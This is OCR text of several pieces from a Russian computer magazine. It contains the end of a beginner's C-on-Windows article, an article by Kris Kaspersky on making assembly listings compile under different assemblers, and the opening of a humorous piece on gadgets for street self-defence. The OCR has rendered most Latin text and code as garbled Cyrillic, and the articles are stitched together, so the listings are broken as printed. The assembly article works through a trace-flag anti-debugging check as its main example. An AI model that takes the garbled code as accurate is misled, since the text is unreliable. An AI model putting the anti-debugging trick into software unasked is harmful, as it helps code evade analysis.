всей нечисти, что мешаетжить нормальному 
пользователю воровством паролей, написа- 
но именно на ней. 
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Дрался 


Написал 


Почитал 


ІІзегтосІе — 


Попросили 


с Оеірііі- 


трояна. 


подшивку 


фигня. 


написать 


кодером. 


Весит 


Коди н га — 


Сделал 


ботнет 


Теперь он 


100 Кб — 


уложился 


первый 


за два дня. 


пишет на си. 


друзья 


в 2 Кб. 


драйвер. 


Взялся. 



чмырили. 



Первая программа 

Теперь перед тобой открыт файл с расширени- 
ем срр, который будет скомпилирован, если ты 
полезешь в меню ВиіІсІ и наткнешься там на эле- 
мент ВиіІсІ <имя проектах Не думай, что я тебе 
лапшу на уши все это время вешал. Показываю, 
как этим пользоваться. 

Обозначаешь сначала в программе хидер на 
все случаи жизни: 

#іпсІибе <ѵѵіпсіоѵѵ5.і"і> 

Потом определяешь пустую функцию, с кото- 
рой начнется выполнение программы. У обыч- 
ных приложений — это ѴѴіпМаіп, у консоль- 
ных — просто таіп. 

іпі ѴѴІІМАРІ \Л/іпМаіп(НІ[\І5ТАІ\ІСЕ, НІМЗТАІМСЕ, 
РТЗТН, іпі) 

{геіигпО; } 

Она ничего не делает — просто ноль возвра- 
щает. Да нам и не нужно, чтобы она что-то де- 
лала. Хотя ради разнообразия можно вставить 
после первой фигурной скобки вызов функции 
МеззадеВох, чтобы не казалось, что мы все это 
время писали программу_которая_ничего_не_ 
делает. Смотри: 

#іпсІисІе <ѵѵіпсіоѵѵ5.Н> 

іпі ѴѴІЫАРІ ѴѴіпМаіп(НІМЗТАІ\ІСЕ, НІМЗТАІМСЕ, 
РТЗТВ, іпі) 



{ 

МеззадеВох(0, "Здравствуй, Мир!", 

"Ты прекрасен!", 0); 
геіигпО; 

} 

Если же ты ретроманьяк и хочешь консольное 
приложение, то нам придется вначале объяс- 
нить линкеру, что мы консольники, и немного 
изменить главную функцию. 

#іпсІибе <ѵѵіпбоѵѵз.Іп> 

// для функции ргіпіі свой хидер 
#іпсІибе <зЙіо.Н> 

#ргадтасоттепі(Ііпкег,"/ЗиВЗУЗТЕМ:СОМЗОЕЕ") 

іпі таіп(іпі агдс, сНаг **агдѵ) 

{ 

ргіпіі("НеІІо, ѵѵогісі !"); 
геіигпО; 

} 

Прагма в пятой строчке определяет тип на- 
шего приложения. С тем же успехом вместо 
СОІ\ІЗОІ_Е там могло красоваться ѴѴІШОѴѴЗ 
или ІМАТІѴЕ. Прагма — штука жутко полезная. 
Вот захочешь, чтобы твой РіеІІоѵѵогІсІ 1 Кб зани- 
мал, добавишь строку: 

//стандартная точка входа, заталкиваемая 
// компилятором, заменяется нашей 
#ргадтасоттепі(Ііпкег, и /ЕГ\ІТНУ:ѴѴіпМаіп") 



И почти все лишнее из программы исчезнет. 
Можно еще секции смержить (ключ /МЕВОЕ), 
убрать всякие проверки, ОРТ и подобную фиг- 
ню, но я обещал, что не буду о документации. 
Для этого есть МЗОЫ, без которого, кстати, ни 
один нормальный ѵѵіпбоѵѵз-кодер еще не обхо- 
дился. Коэффициент пгіизі Іпаѵе у него — 1 00%. 
Т ак что вместе со студией тебе абсолютно точ- 
но нужно обзавестись МЗОКІ. Вот. Надеюсь, 
дорогой Оеірбі-кодер, этого короткого матери- 
ала хватит тебе для того, чтобы написать твою 
первую программу на си и, как говорят в ВНС, 
вступить и компилировать. 

Чтобы скомпилить программу, просто нажми 
СТВЕ+ЗНІРТ+В. Заодно убедишься, что все 
приведенные листинги настоящие. 

ВІЫАПѴ ѴОІЖ’З ла 



9 

Если покопаешься, то на дис- 
ке ты сумеешь обнаружить 
видеоматериалы к статье. 
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КРИС КАСПЕРСКИ 




СосІіпд/ А5м 

Компилируем 

невозможное 



Делаем из не пойми какого азт-сорца рабочий код 



В СЕТИ ЛЕЖИТ МНОЖЕСТВО 
АССЕМБЛЕРНЫХ ЛИСТИНГОВ, 
НО БОЛЬШИНСТВО ИЗ НИХ НА- 
ХОДЯТСЯ В СИЛЬНО РАЗОБРАН- 
НОМ СОСТОЯНИИ. В ТАКОМ 
ВИДЕ ИХ СОВЕРШЕННО НЕ- 
ВОЗМОЖНО ИСПОЛЬЗОВАТЬ. 
ОДНАКО НЕ СТОИТ КОМПЛЕК- 
СОВАТЬ ПО ЭТОМУ ПОВОДУ, в 
ЭТОЙ СТАТЬЕ КРИС РАССКАЖЕТ 
ТЕБЕ О ТОМ, КАК ПРИЧЕСАТЬ 
КРИВОЙ КОД, ВНЕДРИТЬ ЕГО В 
СВОЮ ПРОГРАММУ, ВЫБРАТЬ 
ПРАВИЛЬНЫЙ ТРАНСЛЯТОР И 
КЛЮЧИ КОМАНДНОЙ СТРОКИ. 



Такие разные ассемблеры 

Ассемблер — это не только язык, но еще и 
транслятор. То, что язык РОР-11 не приго- 
ден для х86, — понятно, но вот несовмес- 
тимость ассемблерных трансляторов друг 
с другом для многих становится новостью. 
Что составляет фундамент ассемблера как 
языка? Мнемоники машинных команд (тоѵ, 
пор, стр) — это раз. Средства самого язы- 
ка (метки, директивы, макросы) — это два! 
Формально за мнемоники отвечают ІпТеІ 
и АІѴЮ. Именно они дают символические 
имена машинным командам, регистрам, 
флагам и т. д. Большинство х86-ассемб- 
леров придерживаются этой нотации (хоть 
она никем и не стандартизирована), однако 



«большинство» — еще не все. В мире *піх 
широко распространен АТ&Т синтаксис, 
отличающийся не только мнемоникой, но 
даже порядком операндов! Здесь операнд- 
приемник расположен не слева, как у Іпіеі, 
а справа!!! Регистры начинаются со знака 
процента, константы — со знака доллара, 



а инструкции имеют суффикс, соответс- 
твующий типу обрабатываемых данных. На 
языке ІпіеІ пересылка в регистр еах значе- 
ния 666И выглядит так: « тоѵ еах, 6666 » , а на 
АТ&Т так: «тоѵі $6666, %еах». Программа, 
предназначенная для одного типа ассем- 
блеров, не может быть откомпилирована 
на другом, без радикальной переделки или 
автоматической конвертации ! Но даже сре- 
ди ассемблеров своего типа наблюдается 
разброд, разнобой и множество различий: 
в ключевых словах, в правилах оформле- 
ния листинга, в поставляемых библиотеках 
и заголовочных файлах и т. д. Если только 
совместимость не заявлена явно, транс- 
лировать программу нужно тем и только 



тем ассемблером, для которого она пред- 
назначена. В противном случае готовься к 
переделкам, то есть к адаптации. Отличия 
зачастую проявляются в самых неожидан- 
ных местах. Некоторые ассемблеры пони- 
мают, что «тоѵ еах, х» — это то же самое, 
что и «тоѵ еах,[х]», некоторые — нет. Они 



спотыкаются и выдают ошибку. Но это еще 
ничего! Гораздо хуже, когда транслятор 
молчаливо трактует эту конструкцию как 
«тоѵ еах, оіізеі х», что совсем не одно и то 
же! Так что при переносе программы прихо- 
дится быть очень и очень осторожным. 
Совместимость О — вообще отдельная 
песня. Программы, ориентированные на 
М8-003, без мата не только не транспор- 
табельны, но и непереносимы. Для них 
характерно прямое взаимодействие с 
оборудованием, доступное в І\ІТ только с 
ядерного уровня, не говоря уже о том, что 
16-разрядный код вызывается из 32-раз- 
рядных приложений только через ОРМІ, 
да и то не без ухищрений. Таким образом, 
прежде чем транслировать ассемблерную 
программу, необходимо отождествить, для 
какого транслятора и операционной систе- 
мы она предназначена! С ассемблерными 
фрагментами, выхваченными из «родного» 
контекста, приходится еще хуже . Допустим , 
в некоторой статье описывается интерес- 
ный антиотладочный прием и приводится 
ассемблерный код, но, как встроить его в 
свою программу, не говорится. Знакомая 
ситуация, не правдали? Непосредственная 
трансляция невозможна, так как трансля- 
тор дико матерится, но ничего не отвечает. 



^■4 О Я Я € 1 Г ^ 

А Гіте 
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Определение целевой платформы 

Проще всего определить разрядность. 
Если в листинге преобладают 16-разряд- 
ные регистры типа АХ/ВХ/СХ, то, скорее 
всего, она предназначается для М8-Э05. 
Если встречаются прямые вызовы преры- 
ваний ІІМТ 21 И, ІІМТ 136, ІІМТ 166, ІІМТ 106 — 
это точно М5-ЭОЗ, и от попытоктрансляции 
программы под ІМТ лучше сразу возде- 
ржаться. То же самое относится и к портам 
ввода/вывода (инструкциям 1ІМ/ОІІТ). Хотя 
І\ІТ и позволяет открывать к ним доступ с 
прикладного уровня — это не выход, и та- 
кую программу проще переписать. 
32-режим характеризуется регистрами 
ЕАХ/ЕВХ/ЕСХ. Это может быть как про- 
грамма для ѴѴіпбоѵѵз, так и для ООЗ/ЭРМІ. 
ѴѴіпбоѵѵз распознается по своим АРІ-функ- 
циям, ЭОЗ/ЭРМІ — по прерыванию ІМТ 316. 
Прерывание ІІМТ 2Р6 свидетельствует о 
принадлежности к9х, ІІМТ 2Р6/ЗѴЗЕІМЕТВ — 
о принадлежности к ІМТ/ХР. Через эти пре- 
рывания осуществляется доступ к низко- 
уровневому АРІ операционной системы, что 
делает такие программы непереносимыми. 
Привилегированные инструкции защищен- 
ного режима или вызовы функций, экспор- 
тируемых ядром, например ІоОеЮиггепІІгрЗ 
ІаскІ_осаііоп, говорятотом, что код — драй- 
вер (или его фрагмент), совершенно не 
приспособленный к работе в прикладном 
режиме. Если листинг не вызывает никаких 
АРІ-функций, не дергает прерываниями, не 
содержит привилегированных инструкций 
и не обращается к памяти по абсолютным 
адресам (типа тоѵ еах,Із:[206]), то он мо- 
жет работать в любой 32-разрядной опера- 
ционной системе. 



Определить транслятор несколько слож- 
нее. Признаком ТАЗМ'а являются дирек- 
тивы «іитрз» и «Іосаіз» в начале файла. 
РАЗМ обычно определяется по директиве 
«Іогтаі», например «ІогтаІРЕОШ 4.0», что, 
впрочем, не совсем надежно, и хроничес- 
кому отсутствию ключевого слова оіізеі На 
долю МАЗМ'а приходится все остальное. 

Метод ассемблерных вставок 

В качестве боевого примера рассмотрим 
классический антиотладочный код, встре- 
чающийся во многих статьях и книгах: 

; назначим свой обработчик структурных 
; исключений 
ризб оЯзеІ ту_з6е 

; сохраняем старый обработчик в цепочке 
ризб бѵѵогб рІіТз:[0] 

; регистрируем новый обработчик 
тоѵ (з:[0],езр 

ризб! ; толкаем в стек флаги 

; взводим трассировочный бит 

ог бѵѵогб рІг[езр], 1 006 

; выталкиваем обновленный бит в регистр 

; флагов, заставляя ЦП возбуждать исклю- 

; чение на каждой команде 

рорГ 

хогеах,еах 

; без отладчика после хог возбуждается 
; исключение и управление получает 
; ту_зеб, а в еах будет не ноль 

; под отладчиком исключение молчаливо 

; «съедается» 

ту_зеб: 

Іезіеах.еах 

; если отладчика нет, то еах ! = 0 
\пг беЬиддег_із_ргезеп{ 



А — не ТО/ѴЫСО 

И 'ТРАНСЛЯТОР 




64-режим х86-64 распознается по регист- 
рам ВАХ/РЮХ/ВСХис32-разряднымитранс- 
ляторами, естественно, не совместим. 
*піх-системы распознаются своим харак- 
терным АТ&Т синтаксисом. Программы, 
опирающиеся на библиотеку ІіЬс, легко пе- 
реносятся в ѴѴіпбоѵѵз, поскольку ІіЬс — это 
стандартная Си-библиотека, однако неко- 
торые никсовые функции в ее ѴѴіпбоѵѵз-вер- 
сии не реализованы. В частности, отсутс- 
твует вызов Іогк, расщепляющий процесс 
на два. В ряде случаев перенос все-таки 
возможен. Особенно это относится к мате- 
матическим функциям, абстрагированным 
от системного мира. Программы, работаю- 
щие в обход ІіЬс через интерфейс ІІ\ІТ 806/ 
саІІ 00076:000000006 (всякие вирусы и чер- 
ви), практически непереносимы. 



Как его откомпилировать? На самостоя- 
тельную программу оно как-то не тянет... А 
давай попробуем заточить код под ассемб- 
лерную вставку. В большинстве Си-компи- 

ляторов она оформляется как: « азт{... 

ассемблерный код...}», но непосредствен- 
но осуществить этот замысел не получит- 
ся! Ведь наш ассемблерный листинг, как 
и большинство других демонстрационных 
программ, содранных с наглядно-агитаци- 
онных пособий, представляет собой нечто 
промежуточное между псевдокодом и рабо- 
чей программой. 

Во-первых, метка беЬиддег_із_ргезепІ не 
определена и вставлена для наглядности; 
во-вторых, мы уже установили обработчик 
структурных исключений, флаг трассиров- 
ки взвели, а вот о том, что после заверше- 



ния проверки на отладчик все необходимо 
вернуть обратно, забыли! Поэтому перед 
употреблением листинг необходимо слегка 
доработать, например, так: 

Законченная программа апіі-беЬиа.с 
таіп() 

{ 

іпіа; 

азт{ 

//ассемблерная вставка — начало 

ризб о^зеі ту_зе6 

ризб бѵѵогб рШз:[0] 

тоѵ (з:[0],езр 

ризб( 

огбѵѵогсі р{г[езр],100б ;зеигарЯад 
рорГ 

хог еах, еах 
ту_зеб: 

; восстанавливаем старый обработчик 
рор бѵѵогб р{Нз:[0] 

; восстанавливаем стек 
абб езр,4 

; возвращаем результат в переменной а 
тоѵ а, еах 

} ; ассемблерная вставка — конец 

// проверка переменной а на равенство нулю 
ргіпЩ"%з\п", 

а? "по беЬиддег" : "ипбег беЬиддег"); 



Не самый лучший вариант, конечно. При 
входе в обработчик структурных исключе- 
ний мы должны выйти из него через недо- 
кументированную АРІ-функцию Сопііпие, 
хотя... будет работать и так. Давай лучше 
сосредоточимся на оформлении ассемб- 
лерной вставки. 

Мы удаляем «\пт. беЬиддег_із_ргезепІ», а 
вместо этого возвращаем значение через 
предварительно объявленную переменную 
«а». Компилируем программу как обычно 
(«сі.ехе апІі-беЬид.с») и пытаем, то есть де- 
лаем попытку запустить. При прогоне под 
ЗоІІІСЕ, ОІІуЭЬд или любым другим неэму- 
лирующим отладчиком на экране покажет- 
ся ипбег беЬиддег или по беЬиддег. Значит, 
трансляция удалась! 

А вот другой классический пример: 



.собе 
зІаП: 
ризб 0 
ризб 0 

ризб оТзе! з0 
ризб 0 

саІІ МеззадеВохА 



; секция кода 
; точка входа 
; иТуре 
; ІрСатІіоп 
; ІрТехІ 
; бѴѴпб 



; после нажатия на ок выходим 
ге* 



.баіа ; секция данных 

; строка, которую мы будем выводить 
з0 6Ь "беІІо,ѵѵогбГ,(Юб,0Аб,0 

епб зіаіі 
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Попытка загнать текст программы в ассем- 
блерную вставку ни к чему хорошему не 
приводит. Компилятор кроет нас матом и 
компилить отказывается. Приходится дейс- 
твовать стратегически. То есть свирепо и 
радикально. Убираем директивы .собе и 
.баіа вместе с ненужной инструкцей «геѣ» 
(в оригинале она завершает программу, 
пользуясь тем фактом, что при запуске РЕ- 
файла на вершине стека лежит адрес на 
термирующую процедуру, однако в стеко- 
вом фрейме нашей ассемблерной вставки 
ничего подобного нет). 

Метку зѣагѣ можно, в принципе, и не убирать, 
а вот с зО придется покончить. Ну не подде- 
рживает встроенный ассемблер директивы 
«6Ь», что тут поделать?! Приходится объ- 
являть строковую константу средствами 
самого Си. Она может быть размещена как 
в стеке (как локальная переменная), так и 
в секции данных (как глобальная перемен- 
ная). В действительности строки всегда раз- 
мещаются в секции данных, а в стеклишь за- 
носится их копия, а копия — это оверхид, то 
есть накладные расходы и прочий маст-дай. 
Если переменная объявлена как глобаль- 
ная, то ключевое слово оТСзеІ сохраняет 
свою силу, и компилятор не матерится. 
С локальными переменными все слож- 
нее. Конструкция «ризіі оТСзеІ зО» в этом 
случае разворачивается компилятором 
в «ризб оѣѣзеѣ [еЬр+х]», что, с точки зре- 
ния синтаксиса, совершенно бессмыслен- 
но! Но убирать оіізеі нельзя, поскольку 
«ризИ [еЬр+х]» заталкивает в стек отнюдь 
не указатель на зО, а... значения пер- 
вых четырех байт, то есть ведет себя, как 
«*((ОѴѴОРЮ*)зО)». Правильный вариант вы- 
глядиттак: «Іеа еах.зО/ризИ еах» (разумеет- 
ся, вместо еах можно использовать любой 
другой регистр общего назначения). 

Еще один нюанс. Конструкция «саІІ Мезз- 
адеВохА» выполняется совсем не так, 
как задумывалось, поскольку вместо 
МеззадеВохА коварный компилятор 
подставляет отнюдь не адрес самой 
МеззадеВохА, а указатель на двойное сло- 
во, хранящее адрес МеззадеВохА! Следо- 
вательно, чтобы программа не развалилась 
и не умерла, необходимо использовать 



рдот 'іѵмс 1 

ДИ при* 
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префикс бз, и тогда вызывающий код будет 
выглядеть так: «саІІ бз:МеззадеВохА». 
Обобщив все вышесказанное, мы получаем 
следующую программу. Даже две! С объяв- 
лением строки как глобальной и локальной 
переменной: 

«глобализация» ассемблерных переменных 
#іпсІибе <ѵѵіпбо\л/5.І"і> 

// глобальная переменная, выводимая на экран 
сНаг зО[]="ІпеІІо,ѵѵогбІ\п"; 

таіп() 



ризМ О 
ризНО 

ризН о^зеі зО 
ризН О 

; добавляем бз: 
саІІ бз: МеззадеВохА 



Компилируем: 

сі.ехе ИеІІо_дІоЬаІ.с Іб5ЕВ32.ІіЬ 

Где 163ЕВ32.ІІЬ — имя библиотеки для 
МеззадеВохА, и запускаем. Получаем сим- 
патичное диалоговое окно. 

Вариант с локальной переменной компи- 
лируется и запускается точно так же, как и 
предыдущий: 



«локализация» азт-переменных 

#іпсІибе <ѵѵіпбоѵѵз.Іп> 

таіп() 

{ 

сИаг зО[]="ІіеІІо,ѵѵогбІ\п": 



ризН О 
ризНО 
Іеа еах, зО 
ризМ еах 
ризНО 

саІІ бз: МеззадеВохА 



Ассемблерные вставки — удобная вещь, 
но все-таки имеющая кое-какие ограниче- 
ния. В частности, встроенный ассемблер 
не поддерживает никаких макросредств, и 
если в транслируемой программе присутс- 
твует множество макросов, то без помощи 
МАЗМ'а (или его конкурентов) здесь уже не 
обойтись. 

МА8М, ТА$М и РА5М 

Будем считать, что мы достаточно созрели 
для ассемблирования всей программы це- 
ликом. Казалось бы, чего же тут сложного? 
Бери и транслируй. Ан нет! Вот еще один 
классический пример, выловленный на 
просторах Сети и, по замыслу своего со- 
здателя, выводящий «ГіеІІо,\л/огІб! » : 

.386 

.тобебіаі 

ехіегп ЕхііРгосезз:РНОС 
ехіегп МеззадеВохА: РРЮС 

.баіа 

зОбЬ 'беііо, ѵѵогіб',0 

.собе 
зіаіѣ: 
ризНО 
ризМ О 

ризМ оГзеІ зО 
ризбО 

саІІ МеззадеВохА 
ризНО 

саІІ ЕхіІРгосезз 
епб зіагі 

Транслируем программу МАЗМ'ом, послед- 
нюю версию которого можно позаимство- 
вать из ЫТООК: 

ті /с /соТ ГіеІІо.азт, 



гм, Чзго 
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где /с — ключ, означающий «только ассем- 
блировать, а не линковать» (линкованием 
мы займемся самостоятельно, только поз- 
же), /соТТ — транслировать в соІІ-файл (по 
умолчанию создается оті, с которым мало 
кто из линкеров умеет работать). Ну а ІіеІІо. 
азт — имя нашего файла. МА8М ругает- 
ся: «ѵѵагпіпд А4022: \л/Ші /соІІ зѵѵіісб, Іеабіпд 
ипбегзсоге гециігеб Іог зіаб аббгезз: зіагі», 
но вроде бы ассемблирует. Постой, но ведь 
у нас уже есть метка зіаіі, заданная в качес- 
тве стартового адреса! Что же транслятору 
еще надо?! Уродский МісгозоШ МАЗМ хочет 
иметь «_зІаб» (с подчеркиванием), а у нас 
подчеркивания и нет! Выход: заменить зіагі 
на_зіаі1 или в модели памяти указать тип вы- 
зовов «зібсаіі». Теперь программа ассемб- 
лируется без проблем, и наступает черед ее 
линковать. Это делается так: 

Ііпк/ЗиВ5Ѵ5ТЕМ:ѴѴІІ\ЮОѴѴЗ ІіеІІо.оЬі 
КЕНІ\ІЕІ_32.І_ІВІІ5ЕРІ32.ІІЬ, 

где ЗІІВЗѴЗТЕМ — ключ, отвечающий 
за выбор подсистемы (в данном случае 
ѴѴІІХЮОѴѴЗ, еще есть СОІМЗОБЕ для кон- 
сольных программ и ІЧАТІѴЕ для драйве- 
ров), ІіеІІо.оЬі — имя линкуемого файла, 
КЕВІ\ІЕІ_32.иВ и ІІ5ЕВ32.І_ІВ — имена необ- 
ходимых библиотек, поставляемых вместе 
с РІаШэгт ЗЭК. Если же ЗЭК нет, то линкер 
тз Ііпк может сгенерировать их самосто- 
ятельно, стоит только указать ему ключ 
ЛМРиВ:КЕВЫЕІ_32.0и_. 

ИеІІо2.оЬІ : еггог ЦМК2001 : ипгезоіѵесі ехіегпаі 
зутбоі _Ехі{Ргосезз 

ІіеІІо2.оЬІ : еггог ЕЫК2001 : ипгезоіѵесі ехіегпаі 

зутбоі _МеззадеВохА 

ИеІІо2.ехе : (аіаі еггог ЬКІКІ 1 20: 2 ипгезоіѵеб 

ехіегпаіз 

Вот так номер ! Линкер не может найти фун- 
кции! Почему? Заглянув в Ы8ЕВ32.ІіЬ Ьех- 
редактором, мы увидим, что МеззадеВохА 
там объявлена как _МеззадеВохА@16, где 
_ — признак зібсаіі-вызова, а @16 — раз- 
мер всех аргументов функции в байтах. 
Соответственно, ЕхііРгогезз зовется как 
_ЕхііРгосезз@4, поскольку принимает все- 
го один аргумент, а в 32-разрядном режиме 
все они двухсловные. 

Все равно ни хрена не понятно! Мы же уже 
сказали, что модели памяти — зібсаіі, и 
транслятор послушно добавил ко всем фун- 
кциям знак подчеркивания. Но оказывает- 
ся, что он забыл дописать аргументы. А как 
бы он их дописал? Ведь прототип функции 
объявлен как «РОС»! Вот ассемблер и пос- 
теснялся разводить самодеятельность! 

В комплекте с полной версией МАЗМ'а идут 
іпс-файлы, в которых все прототипы объ- 
явлены правильно, однако в ОЭК ничего 
подобного нет, и поэтому эту работу нам 
приходится выполнять самостоятельно и 



писать так: ехіегп МеззадеВохА@16:пеаг 

или так: ех^егп _ітр МеззадеВохА@16: 

бѵѵогб. В последнем случае функция будет 
вызвана через переходник. Если слово 
зібсаіі в модели памяти не указано и, следо- 
вательно, знак подчеркивания транслято- 
ром не добавляется, обе конструкции будут 
выглядеть так: ехіегп _МеззадеВохА@16: 

пеаг и ехіегп ітр МеззадеВохА@16: 

бѵѵогб. Чтобы не вызывать каждый раз по 
длинному имени, создай короткий алиас, 
обозвав его хоть тздЬох, хоть плЬ, хотя во 
избежание путаницы программисты все- 
таки сохраняют оригинальные АРІ-имена и 
убирают только «_» и «$х». 

Законченный вариант программы будет вы- 
глядеть так: 

.386 

.тобеі Ш 

ехіегп _ЕхіІРгосезз@4:пеаг 
ех{егп_МеззадеВохА@16:пеаг 

.баіа 

зОсІЬ 'ІіеІІо, ѵѵогісі',0 

.собе 
_з1аП: 
ризіі 0 
ризіі 0 

ризіі оТСзеІзО 
ризіі 0 

саІІ _МеззадеВохА@1 6 
ризіі 0 

саІІ _ЕхіІРгосезз@4 
епсі _з1аП 

Программа нормально транслируется и 
даже работает, но не дает ответа на вопрос: 
почему же ее создатель не выполнил все 
эти действия заранее?! Да потому, что про- 
грамма предназначалась для ТАЗМ'а, биб- 
лиотекарь которого именует функции так, 
как написано, а не так, как диктует согла- 
шение о зібсаіі-вызовах. Но почему бы тог- 
да не транслировать программу ТАЗМ'ом?! 
Есть причины. Во-первых, ТАЗМ заброшен 
и уже не развивается (впрочем, МАЗМ не 
развивается тоже). Во-вторых, объектные 
файлы, сгенерированные ТАЗМ'ом, трудно 
интегрировать в другие проекты. В-третьих, 
мыщъх'и испытывают к Багдаду стойкую ан- 
типатию. Но если кому-то нравится ТАЗМ, то 
компилируйте программу так: 

гѳт ассемблируем 
Іазт32/тІ Н2.азт 

гѳт готовим библиотеки из сІІІ 
ітрІІЬ-с изег32.ПЬ 

С ЛѴѴІЫ ЫТ\зуз1ет32\изег32 . сІІ I 
ІтрІІЬ-с кегпеІ32.НЬ 

С:\ѴѴІММТ\зуз1ет32\кегпеІ32.бІІ 

гѳт линкуем 

ІІіпк32 И2.оЬІ -Тре -аа -Б изег32.ПЬ -Б кегпеІ32.ІіЬ 



А нельзя ли ассемблировать нашу програм- 
му замечательным (и притом совершенно 
бесплатным) транслятором РАЗМ? Увы! 
Различия в синтаксисе РАЗМ'а очень зна- 
чительные, и без капитальной правки лис- 
тинга здесь не обойтись. Вот только один 
пример. Широко распространенная конс- 
трукция ЭВ 669И ОЕІР(?) приводит РАЗМ в 
состояние замешательства и ее приходит- 
ся заменять на гЬ 669И, что, несомненно, 
короче, но это же сколько лишней работы 
по переносу делать приходится! Отсутс- 
твие оТТзеІ'а мы уже отмечали. Привычных 
директив тоже нет. Макросредства есть, но 
совсем не те, что в МАЗМ'е, и работают они 
совсем не так! 

После переделки под РА8М программа бу- 
дет выглядеть так: 

іпсіисіе 'ІМСЕЕЮЕ\ѵѵіп32ах.іпс' 

.собе 
зІаП: 
ризіп 0 
ризіі 0 
ризіі з0 
ризіп 0 

саІІ [МеззадеВох] 
ризіп 0 

саІІ [ЕхіІРгосезз] 

.баіа 

зОбЬ 'ІіеІІо, ѵѵогіб',0 
.епб зіагі 

Как видно, исчезли директивы .386" и 
.тобеі, а в начале ключевого слова епб" 
появилась точка, которой раньше не было. 
Включаемый файл «\л/іп32ах.іпс» содержит 
все необходимые определения, и поэтому 
АРІ-функции вызываются по их именам, 
заключенным в квадратики (косвенный 
вызов по ссылке, если делать иначе — все 
рухнет). Ключевое слово оіізеі исчезло из 
инструкции ризЬ зО. Вот, пожалуй, и все. Те- 
перь транслятор пережевывает программу 
и не давится: Іазт ІіеІІо. азт. Нам же оста- 
ется только запустить созданный ехе-файл 
на выполнение и порадоваться тому, как 
хорошо он работает. 

ВШАПѴ УОІІН’8 Ц-Ц 
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Доподлинно неизвестно. 

кто впервые додумался применять 
предметы повседневного обихода для 
самообороны. Возможно, это были 
древние домохозяйки, оттачивавшие на 
мужьях искусство владения скалками, 
или отважные азиатки, отбивавшиеся 
веерами от излишне рьяных кавалеров. 

В наше неспокойное время столь важный 
вопрос, как эффективная защита чести, 
достоинства, имущества и других значимых 
атрибутов современного человека и гражда- 
нина поднимается в основном в телепередачах типа 
«Горячие сводки Северного Дегунино» или «Самьг 
кошмарные преступления НН-го 
века». Впрочем, также не дремлют 
нагоняющие ужас газеты, милицей- 
ские участковые и ископаемые пре- 
подаватели НВП из местных вузов. 

Все они любят давать ценные 
указания, делиться важной информацией и 
развивать громоздкие теории с филоср 
ким подтекстом. Какд 








Иллюстрации: АЛЕКСАНДР ГЛА,! 



ТЕХНИ 



Если подойти к вопросу продольно серьезно, то пять-десять лет ежедневных занятий с седобородым мастером кун-фу из отдаленного тибет- 











И і , 


" 


Ь .і.» 1 








•\н 











ского монастыря наверняка научаттебя не бояться даже люберецких парней в клетчатых шта^з^' н0ЭТИХ - Т0 самыхлет, какправило, и не хватает в твоем и 
без того переполненном расписании. Мы решили поступить гораздо проще, и, сконцентрировав бесценные сведения, попробовать разобраться, что из 
окружающихтебя каждый день предметов может пригодиться для выживания на улице, в метро и прочих общественных местах. Конечно, речь пойдет об 
электронике, без которой сегодня не выходят из дома даже почетные дружинники московской Олимпиады 1980 года. Стоитучесть, что многие девайсы, 
столь любимые нами, способны не столько помочь выпутаться из неприятной ситуации, сколько наоборот, способствовать ее возникновению. Сей щекот- 
ливый момент мы тоже учли — необходимый баланс может и должен быть достигнут. 





ЗОЫѴ 

ЕРІСЗЗОМ 

ѴѴ800 

За последние пять-десять лет сото- 
вые телефоны просто прикипели к их 
счастливым владельцам, и представить 
полноценную активную жизнь в городе 
без этого куска пластика практически не- 
возможно. Конструкторы и маркетологи в 
поте лица создают и «впаривают» потре- 
бителям все новые и новые функции, од- 
нако реально полезных из них появилось 
за последние годы не так уж много. Одно 
из последних нововведений, достойное 
внимания, — совмещение аудиоплеера и 
сотового телефона. Сначала телефоны 
такого рода не позволяли усомниться в 
том, что столь ценное новшество имеет 
своей целью вызвать у тебя головную 
боль и оставить без связи. Первое 
должно было случиться из-за прискор- 
бно низкого качества звука, а второе 
— от постоянного повторения жалкого 
десятка треков, способного поместиться 
в 64 Мбайт бортовой памяти. Ситуация 
постепенно менялась к лучшему вплоть 
до того момента, когда в процесс вмеша- 
лась Золу Егісззоп и принесла с собой 
легендарный бренд ѴѴаІктап, перенесен- 
ный на благодатную почву сотовой связи. 
Первым полноценным сотовым «бродя- 
гой» стал телефон ѴѴ800. Музыкальная 
функциональность телефона на высшем 
уровне: 512 и более Мбайт памяти, 
качественные комплектные наушники, 
прямое ІІЗВ-подключение к компьюте- 
ру, а главное — фирменное качество 
звука Зопу. Дизайн телефона вызывает 
судорожные сокращения мышц у особо 
впечатлительных дамочек и скупую 
мужскую слезу зависти у поклонников 
мрачных «гробиков» отЗіетепз. В качес- 
тве средства сохранения физического и 
морального здоровья, а также оператив- 
ного восстановления статус-кво любому 
сотовому телефону просто нет равных (с 
учетом того, что деньги на счету все-таки 
есть). Один своевременный звонок или в 
нужный момент сделанная фотография 
могут помочь избежать многих проблем 
или решить их, если таковые возникнут. 
Наконец, в наиболее критичных обсто- 
ятельствах телефон может послужить 
неплохим метательным снарядом, учиты- 
вая аэродинамические обводы прочного 
пластикового корпуса. 





Хорошая обувь — залог комфортного пе- 
ремещения по опасным бетонным джунг- 
лям современного мегаполиса. Весной, в 
брачный сезон, самцы Иото зупсгеабегиз 
привлекают самок и самовыражаются, 
надевая особо яркие кроссовки. К со- 
жалению, до последнего времени обувь 
оставалась, пожалуй, не слишком связан- 
ной с высокими технологиями областью 
интересов, не считая, конечно, проекти- 
рования настанцияхЗШсоп ОгарИісз и ро- 
ботизированных фабрик площадью в де- 
сятки гектар, надежноспрятанныхвлесах 
Камбоджи. То есть не было в ней ничего, 
способного по-настоящему тронуть сер- 
дце сурового гаджетовода и техноманья- 
ка, не говоря уже об обычном городском 
жителе. Ситуация серьезно изменилась к 
лучшему с появлением кроссовок Асіісіаз 
1. Эти «тапочки для бега» представляют 
собой первые в мире кроссовки, снабжен- 
ные собственным микропроцессором, 
настраивающим параметры жесткости в 
реальном времени. То есть, когда ты под- 
крадываешься к зазевавшейся жертве 
на водопое (читай, у барной стойки хоро- 
шего ночного клуба), они мягкие, как пух 
ангорской козы, а если нужно прибавить 
оборотов, догоняя уходящий троллейбус, 
они моментально станут крепче подошвы 
страуса эму. 

Оценить способность Асіісіаз 1 помочь 
тебе в важном и ответственном деле за- 
бега наперегонки с десятком фанатов 
проигравшей футбольной команды до 
ближайшего львиного прайда (читай, ми- 
лицейского участка) не представляется 
возможным. Ну, а если силы примерно 
равны, с помощью творения немецкой 
технической мысли ты всегда сможешь 
показать обидчику, как лягается лошадь 
Пржевальского наличном примере. 



А3113А636 

Для того чтобы успешно передать 
